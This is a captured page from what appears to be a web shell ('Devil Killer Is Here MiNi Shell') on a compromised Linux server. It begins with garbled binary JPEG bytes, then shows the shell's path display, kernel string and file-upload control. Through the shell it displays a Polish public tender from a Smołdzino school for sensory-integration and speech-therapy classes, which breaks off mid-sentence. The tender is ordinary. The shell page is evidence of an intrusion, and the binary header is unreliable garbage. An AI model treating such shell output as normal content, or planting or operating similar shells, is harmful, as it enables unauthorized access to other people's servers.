JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251023/0049149001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przeprowadzenia zajęć z integracji sensorycznej oraz zajęć z logopedii dla dzieci z Gminnego Przedszkola w Smołdzinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKOLNO-PRZEDSZKOLNY W SMOŁDZINIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZSP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 771554678</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">BOHATERÓW WARSZAWY 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Smołdzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-214</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598117321</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@smoldzino.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://smoldzino.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przeprowadzenia zajęć z integracji sensorycznej oraz zajęć z logopedii dla dzieci z Gminnego Przedszkola w Smołdzinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f94bab42-f2c6-443b-8312-2e180660be38</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00491490</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00000804/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Realizacja dodatkowych zajęć z integracji sensorycznej oraz zajęć z logopedii dla dzieci z Gminnego Przedszkola w Smołdzinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Realizacja dodatkowych zajęć edukacyjnych dla dzieci i szkoleń dla nauczycieli podnoszące kompetencje kluczowe i zawodowe w Zespole Szkolno-Przedszkolnym w Smołdzinie zajęcia z integracji sensorycznej ” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus (EFS+) w ramach programu Fundusze Europejskie dla Pomorza 2021-2027 (FEP 2021-2027). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f94bab42-f2c6-443b-8312-2e180660be38 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.1	Zgodnie z art. 61 ust. 1 ustawy Pzp, z zastrzeżeniem wyjątków, o którym mowa w niniejszej SWZ – komunikacja między Zamawiającym a Wykonawcami odbywać się będzie w formie elektronicznej, za pośrednictwem ezamowienia https://ezamowienia.gov.pl/pl/ <br/>3.2	W celu skrócenia czasu udzielania odpowiedzi na pytania komunikacja między Zamawiającym a Wykonawcami w zakresie:<br/>−przesyłania Zamawiającemu pytań do treści SWZ;<br/>− przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>-przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu<br/>− przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>− przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>− przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy Pzp;<br/>− przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>− przesyłania odwołania/inne;</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1) jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu; <br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn: Usługa przeprowadzenia zajęć z integracji sensorycznej oraz zajęć z logopedii dla dzieci z Gminnego Przedszkola w Smołdzinie w ramach projektu „Realizacja dodatkowych zajęć edukacyjnych dla dzieci i szkoleń dla nauczycieli podnoszące kompetencje kluczowe i zawodowe w Zespole Szkolno-Przedszkolnym w Smołdzinie zajęcia z integracji sensorycznej ” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus (EFS+) w ramach programu Fundusze Europejskie dla Pomorza 2021-2027 (FEP 2021-2027). prowadzonym w trybie podstawowym; <br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa Pzp”; <br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. <br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7) Wykonawca posiada: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy; <br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO; <br/>8) Wykonawcy nie przysługuje: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu. <br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. <br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSP.48.26.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 117842,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 108414,64 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zajęcia z integracji sensorycznej dla dzieci o specjalnych potrzebach edukacyjnych w wieku przedszkolnym: maksymalnie dla 5 dzieci (Liczba dzieci może ulec zmianie, ze względu na istniejące potrzeby).<br/>11.2025 r. – 30.06.2026r.– 160 godzin zegarowych dla 5 dzieci w wieku przedszkolnym (Liczba dzieci może ulec zmianie, ze względu na istniejące potrzeby). W miesiącu średnio 4 godziny zajęć na każde dziecko ( z pominięciem świat oraz ferii zimowych). <br/>Zajęcia odbywać się będą w Zespole Szkolno-Przedszkolnym w Smołdzinie w sali integracji sensorycznej. Wykonawca przeprowadzi zajęcia na sprzęcie Zamawiającego. Zajęcia prowadzone będą wg ustalonego harmonogramu z rodzicami. Zajęcia mogą odbywać się jednego dnia od godziny 13 do godz. 18.00. <br/>Zgodnie z harmonogramem zajęć na sali integracji sensorycznej odbywają się zajęcia z dziećmi z innych grup. W związku z powyższym proponowane zajęcia mogą odbywać się w czwartki i piątki w godzinach- czwartek od 8.45 oraz w piątek od 8.00.<br/><br/>Przeprowadzenie indywidualnych zajęć z integracji sensorycznej dla dzieci w wieku przedszkolnym, z zastrzeżeniem, że jedna godzina lekcyjna równa się 60 minut zegarowych. W zajęciach udział wezmą dzieci z niepełnosprawnościami różnego typu, które polegać będą na aktywności i ćwiczeniach ruchowych stymulujących układy zmysłów, tj. przedsionkowy, priopriocepcji. <br/>Wymagania w odniesieniu do osoby/ób prowadzących:<br/><br/>Osoba/y realizująca/e przedmiot zamówienia musi/ą posiadać niezbędną wiedzę, kwalifikacje i doświadczenie do wykonania przedmiotu zamówienia.<br/>Rozliczenie z Wykonawcą będzie odbywać się na podstawie prowadzonego dziennika zajęć<br/>1.	Informacje dodatkowe:<br/>1)	liczba uczestników biorących udział w zajęciach może ulec zmianie,<br/>2)	dla wskazanych w zamówieniu zajęć Wykonawca zapewni odpowiedni:<br/>a)	niezbędne wyposażenie potrzebne do prawidłowej realizacji zamówienia, sprzęt i materiały potrzebne do przeprowadzenia pokazów/eksperymentów/doświadczeń dot. Części I i II <br/>b)	obsługę wykwalifikowanego personelu,<br/>Szczegółowe obowiązki Wykonawcy<br/>1.	W ramach realizacji Umowy Wykonawca zobowiązuje się w szczególności do: <br/>a)	zapewnienia poprawności merytorycznej oraz wysokiej jakości świadczonych usług,<br/>b)	systematycznej i zgodnej z harmonogramem realizacji warsztatów edukacyjnych,<br/>c)	sprawowania opieki nad uczestnikami projektu podczas realizowanych zajęć,<br/>d)	terminowego dostarczania dokumentów potwierdzających realizację wykonanej usługi <br/>w danym okresie rozliczeniowym (raport/protokół z wykonanej usługi, rachunek/faktura, karta czasu pracy),<br/>e)	bezkonfliktowej i sprawnej współpracy ze wszystkimi przedstawicielami Zamawiającego,<br/>f)	przygotowania zajęć edukacyjnych zgodnie z postanowieniami Umowy oraz <br/>z uwzględnieniem uwag, zastrzeżeń i wskazówek Zamawiającego; <br/>g)	ubezpieczenia na własny koszt transportu materiałów, urządzeń, sprzętu oraz innych przedmiotów niezbędnych do wykonywania poszczególnych warsztatów edukacyjnych,<br/>h)	udostępniania Zamawiającemu, na każdym etapie realizacji Umowy, wszelkich informacji i dokumentacji jej realizacji;<br/>i)	przestrzegania wytycznych, poleceń i założeń projektu,<br/>j)	ponoszenia odpowiedzialności materialnej za powierzone mienie,<br/>k)	należy mieć na uwadze, że zgodnie z wytycznymi w zakresie Wytyczne dotyczące kwalifikowalności wydatków na lata 2021-2027 łączne zaangażowanie zawodowe osoby w realizację wszystkich projektów finansowanych z funduszy strukturalnych i FS oraz działań finansowanych z innych źródeł, w tym środków własnych beneficjenta i innych podmiotów, nie przekracza po przeliczeniu 276 godzin miesięcznie (jeśli dotyczy).<br/>Część nr 2 (Zadanie nr 2) – Usługa przeprowadzenia zajęć dodatkowych z logopedii dla 7 dzieci podzielone na 3 grupy ćwiczeniowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 53042 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenę końcową oferty dla danego zamówienia stanowić będzie suma punktów oferty uzyskanych w<br/>kryterium „Cena” i „doświadczenie osoby/osób wyznaczonej/wskazanych do realizacji zamówienia” oraz „Aspekt społeczny”.<br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt. Obliczenia będą prowadzone z dokładnością do 2<br/>miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zajęcia z logopedii w wieku przedszkolnym: maksymalnie dla 7 dzieci (Liczba dzieci może ulec zmianie, ze względu na istniejące potrzeby).<br/>11.2025 r. – 31.07.2026r.– 108 godzin zegarowych dla 7 dzieci w wieku przedszkolnym (Liczba dzieci może ulec zmianie, ze względu na istniejące potrzeby). Zajęcia mają odbywać się dla 3 grup ćwiczeniowych. W miesiącu średnio 4 godziny zajęć na każdą grupę ( z pominięciem świat oraz ferii zimowych). Zajęcia odbywać się będą w Zespole Szkolno-Przedszkolnym w Smołdzinie w sali logopedycznej. Wykonawca prowadzi zajęcia na sprzęcie Zamawiającego. Zajęcia prowadzone będą wg ustalonego harmonogramu z rodzicami. Zajęcia mogą odbywać od godziny 8.00 do godz. 16.00.<br/>Osoba/y realizująca/e przedmiot zamówienia musi/ą posiadać niezbędną wiedzę, kwalifikacje i doświadczenie do wykonania przedmiotu zamówienia.<br/>Rozliczenie z Wykonawcą będzie odbywać się na podstawie prowadzonego dziennika zajęć<br/>2.	Informacje dodatkowe:<br/>3)	liczba uczestników biorących udział w zajęciach może ulec zmianie,<br/>4)	dla wskazanych w zamówieniu zajęć Wykonawca zapewni odpowiedni:<br/>a)	niezbędne wyposażenie potrzebne do prawidłowej realizacji zamówienia, sprzęt i materiały potrzebne do przeprowadzenia pokazów/eksperymentów/doświadczeń dot. Części I<br/>b)	obsługę wykwalifikowanego personelu,<br/>Szczegółowe obowiązki Wykonawcy<br/>2.	W ramach realizacji Umowy Wykonawca zobowiązuje się w szczególności do: <br/>a)	zapewnienia poprawności merytorycznej oraz wysokiej jakości świadczonych usług,<br/>b)	systematycznej i zgodnej z harmonogramem realizacji warsztatów edukacyjnych,<br/>c)	sprawowania opieki nad uczestnikami projektu podczas realizowanych zajęć,<br/>d)	terminowego dostarczania dokumentów potwierdzających realizację wykonanej usługi <br/>w danym okresie rozliczeniowym (raport/protokół z wykonanej usługi, rachunek/faktura, karta czasu pracy),<br/>e)	bezkonfliktowej i sprawnej współpracy ze wszystkimi przedstawicielami Zamawiającego,<br/>f)	przygotowania zajęć edukacyjnych zgodnie z postanowieniami Umowy oraz <br/>z uwzględnieniem uwag, zastrzeżeń i wskazówek Zamawiającego; <br/>g)	ubezpieczenia na własny koszt transportu materiałów, urządzeń, sprzętu oraz innych przedmiotów niezbędnych do wykonywania poszczególnych warsztatów edukacyjnych,<br/>h)	udostępniania Zamawiającemu, na każdym etapie realizacji Umowy, wszelkich informacji <br/>i dokumentacji jej realizacji;<br/>i)	przestrzegania wytycznych, poleceń i założeń projektu,<br/>j)	ponoszenia odpowiedzialności materialnej za powierzone mienie,<br/>k)	należy mieć na uwadze, że zgodnie z wytycznymi w zakresie Wytyczne dotyczące kwalifikowalności wydatków na lata 2021-2027 łączne 